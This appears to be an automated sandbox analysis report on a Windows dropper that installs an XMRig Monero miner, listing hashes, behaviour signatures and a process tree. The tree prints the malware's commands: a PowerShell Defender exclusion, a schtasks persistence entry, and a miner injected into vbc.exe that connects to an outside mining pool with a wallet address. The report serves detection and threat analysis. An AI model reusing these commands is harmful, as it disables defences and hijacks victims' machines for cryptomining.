Analysis
-
max time kernel
145s -
max time network
148s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
07-11-2022 11:35
Static task
static1
General
-
Target
1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe
-
Size
3.0MB
-
MD5
c766d0165cf4337e52985a58b03f2a91
-
SHA1
85a82f096757f309d47fa64f5cb7ab2faaff158b
-
SHA256
1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06
-
SHA512
59c98c7a647302f1e9aa4c2a645068ec9766082262f7e5e04b6c7b3f7ff842ef37655861bb92035b9ef498a97c7924a20c4e4c5148922fe1849d3d55aa8162c5
-
SSDEEP
49152:tBiD61h+tHbmYIm7oOIBJJFgNEe0GkOL1F6eQ+hdAwUXuQgVS/:GDGtzmNEejzS/
Malware Config
Signatures
-
XMRig Miner payload 5 IoCs
resource yara_rule behavioral1/memory/1668-202-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1668-203-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1668-204-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1668-205-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1668-207-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 5088 AVPTQBAEW.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5088 set thread context of 1668 5088 AVPTQBAEW.exe 80 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3180 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5064 timeout.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 992 powershell.exe 992 powershell.exe 992 powershell.exe 4324 powershell.exe 4324 powershell.exe 4324 powershell.exe 5088 AVPTQBAEW.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 620 Process not Found -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeIncreaseQuotaPrivilege 992 powershell.exe Token: SeSecurityPrivilege 992 powershell.exe Token: SeTakeOwnershipPrivilege 992 powershell.exe Token: SeLoadDriverPrivilege 992 powershell.exe Token: SeSystemProfilePrivilege 992 powershell.exe Token: SeSystemtimePrivilege 992 powershell.exe Token: SeProfSingleProcessPrivilege 992 powershell.exe Token: SeIncBasePriorityPrivilege 992 powershell.exe Token: SeCreatePagefilePrivilege 992 powershell.exe Token: SeBackupPrivilege 992 powershell.exe Token: SeRestorePrivilege 992 powershell.exe Token: SeShutdownPrivilege 992 powershell.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeSystemEnvironmentPrivilege 992 powershell.exe Token: SeRemoteShutdownPrivilege 992 powershell.exe Token: SeUndockPrivilege 992 powershell.exe Token: SeManageVolumePrivilege 992 powershell.exe Token: 33 992 powershell.exe Token: 34 992 powershell.exe Token: 35 992 powershell.exe Token: 36 992 powershell.exe Token: SeDebugPrivilege 5088 AVPTQBAEW.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeIncreaseQuotaPrivilege 4324 powershell.exe Token: SeSecurityPrivilege 4324 powershell.exe Token: SeTakeOwnershipPrivilege 4324 powershell.exe Token: SeLoadDriverPrivilege 4324 powershell.exe Token: SeSystemProfilePrivilege 4324 powershell.exe Token: SeSystemtimePrivilege 4324 powershell.exe Token: SeProfSingleProcessPrivilege 4324 powershell.exe Token: SeIncBasePriorityPrivilege 4324 powershell.exe Token: SeCreatePagefilePrivilege 4324 powershell.exe Token: SeBackupPrivilege 4324 powershell.exe Token: SeRestorePrivilege 4324 powershell.exe Token: SeShutdownPrivilege 4324 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeSystemEnvironmentPrivilege 4324 powershell.exe Token: SeRemoteShutdownPrivilege 4324 powershell.exe Token: SeUndockPrivilege 4324 powershell.exe Token: SeManageVolumePrivilege 4324 powershell.exe Token: 33 4324 powershell.exe Token: 34 4324 powershell.exe Token: 35 4324 powershell.exe Token: 36 4324 powershell.exe Token: SeLockMemoryPrivilege 1668 vbc.exe Token: SeLockMemoryPrivilege 1668 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1668 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 4952 wrote to memory of 992 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe 67 PID 4952 wrote to memory of 992 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe 67 PID 4952 wrote to memory of 4968 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe 69 PID 4952 wrote to memory of 4968 4952 1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe 69 PID 4968 wrote to memory of 5064 4968 cmd.exe 71 PID 4968 wrote to memory of 5064 4968 cmd.exe 71 PID 4968 wrote to memory of 5088 4968 cmd.exe 73 PID 4968 wrote to memory of 5088 4968 cmd.exe 73 PID 5088 wrote to memory of 4324 5088 AVPTQBAEW.exe 74 PID 5088 wrote to memory of 4324 5088 AVPTQBAEW.exe 74 PID 5088 wrote to memory of 4540 5088 AVPTQBAEW.exe 76 PID 5088 wrote to memory of 4540 5088 AVPTQBAEW.exe 76 PID 4540 wrote to memory of 3180 4540 cmd.exe 78 PID 4540 wrote to memory of 3180 4540 cmd.exe 78 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80 PID 5088 wrote to memory of 1668 5088 AVPTQBAEW.exe 80
Processes
-
C:\Users\Admin\AppData\Local\Temp\1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe"C:\Users\Admin\AppData\Local\Temp\1b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8189.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:5064
-
-
C:\ProgramData\WindowsMail\AVPTQBAEW.exe"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"5⤵
- Creates scheduled task(s)
PID:3180
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1668
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD5c766d0165cf4337e52985a58b03f2a91
SHA185a82f096757f309d47fa64f5cb7ab2faaff158b
SHA2561b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06
SHA51259c98c7a647302f1e9aa4c2a645068ec9766082262f7e5e04b6c7b3f7ff842ef37655861bb92035b9ef498a97c7924a20c4e4c5148922fe1849d3d55aa8162c5
-
Filesize
3.0MB
MD5c766d0165cf4337e52985a58b03f2a91
SHA185a82f096757f309d47fa64f5cb7ab2faaff158b
SHA2561b0167b65c9b113f44d38ae3a49d67adff514a7b354fd2809c619c458b8e6e06
SHA51259c98c7a647302f1e9aa4c2a645068ec9766082262f7e5e04b6c7b3f7ff842ef37655861bb92035b9ef498a97c7924a20c4e4c5148922fe1849d3d55aa8162c5
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD52f98ffbecf3ccf4e5fe8c8f889c9ab51
SHA1dcd55850425c3b10dc9149979722772821b4a19c
SHA256875e5437c29eb6b8583bb3ff5d4fbbc029a1fe4913eccf26720ffff0d0f0334b
SHA5127d0e14ae83731633b15d30b071cc64fcd10d3a5e3af3cb77d1b803a1bc66fefef9183279f67058b73aadcd111ec13cb49d52b04aba9b9b20b36154171ce49d5f
-
Filesize
149B
MD5cfd4bf22f7c04fd192562e4ae64ebcb5
SHA1173a384f96e1938989b9f919f086f37e0de6ba5f
SHA256ff854806c6bbc7ce5d1abe77aa9bc17a550b37be1e04421360a7d65e5ea6b5f6
SHA512c6b042408e2818308aa70d7209bc427bbf58a6b1f46be3226ac8c5cda0d52b79d33522fb8d83c4923e6cdb306b154d7dbef15669d087ff5de95093e4fff8b223